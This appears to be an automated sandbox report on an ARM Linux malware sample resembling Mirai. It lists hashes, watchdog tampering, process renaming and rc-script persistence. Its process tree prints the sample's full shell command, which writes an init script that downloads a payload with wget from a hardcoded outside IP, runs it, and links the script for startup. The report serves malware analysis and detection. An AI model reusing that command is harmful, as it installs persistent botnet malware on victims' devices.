Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
05/09/2024, 17:36
Behavioral task
behavioral1
Sample
arm7.nn.elf
Resource
debian9-armhf-20240729-en
General
-
Target
arm7.nn.elf
-
Size
157KB
-
MD5
9fe44e38f31dfc22fc37f8f4b0ad665b
-
SHA1
003f2be0ac848c14527ec7b555e6517b8099c152
-
SHA256
463cd5a52848c54f9c7736f71dc0fa2e2e117e14798cbfd7d7ca4f0ab32e9a8d
-
SHA512
231d8d66523de1e9b3f41630e869a721f66a916ecf5fecd763108407d89fd885bc12a68b7efdf668cfd9d2989c6c9a1de5bd07fb313427a2fe2760aeb8720baa
-
SSDEEP
3072:hkDdGanTaRJKm7GiSAubGkU58hsugq3VXM/9//mAwYhDNc:hkDhnTaRJKm7GiGbGmKugq35M/9XmAwZ
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog arm7.nn.elf File opened for modification /dev/misc/watchdog arm7.nn.elf -
description ioc Process File opened for modification /etc/init.d/arm7.nn.elf sh -
Modifies rc script 2 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
description ioc Process File opened for modification /etc/rc.local arm7.nn.elf -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself /var/iwonderwhoiam 655 arm7.nn.elf -
Command and Scripting Interpreter: Unix Shell 1 TTPs 4 IoCs
Execute scripts via Unix Shell.
pid Process 659 sh 667 sh 671 sh 657 sh -
description ioc Process File opened for reading /proc/filesystems mkdir
Processes
-
/tmp/arm7.nn.elf/tmp/arm7.nn.elf1⤵
- Modifies Watchdog functionality
- Modifies rc script
- Changes its process name
PID:655 -
/bin/sh/bin/sh -c "echo \"#!/bin/sh # /etc/init.d/arm7.nn.elf case \\\"\$1\\\" in start) echo 'Starting arm7.nn.elf' /tmp/arm7.nn.elf & wget http://45.202.35.35/lol -O /tmp/lol chmod +x /tmp/lol /tmp/lol & ;; stop) echo 'Stopping arm7.nn.elf' killall arm7.nn.elf ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/arm7.nn.elf"2⤵
- Modifies init.d
- Command and Scripting Interpreter: Unix Shell
PID:657
-
-
/bin/sh/bin/sh -c "chmod +x /etc/init.d/arm7.nn.elf"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:659 -
/bin/chmodchmod +x /etc/init.d/arm7.nn.elf3⤵PID:662
-
-
-
/bin/sh/bin/sh -c "mkdir -p /etc/rc.d"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:667 -
/bin/mkdirmkdir -p /etc/rc.d3⤵
- Reads runtime system information
PID:669
-
-
-
/bin/sh/bin/sh -c "ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:671 -
/bin/lnln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf3⤵PID:673
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
407B
MD5cca1fc56c22484f5782c4052405cd45c
SHA17991a1d47122cc9807ac8c80d2a8749db43da8b5
SHA25616b6e8365451e48a63324d63e58a066662f3f4380f2b5efba7f6b4fe054e8c3a
SHA5128f44534e1711ef9619e6e323c9117a7bbe9b38a7533ab69f6f8de414283b936283c2a4c2092e3ad3e107d5c1ae3ef56c743aa80e155f42da7d9376f5196eff1d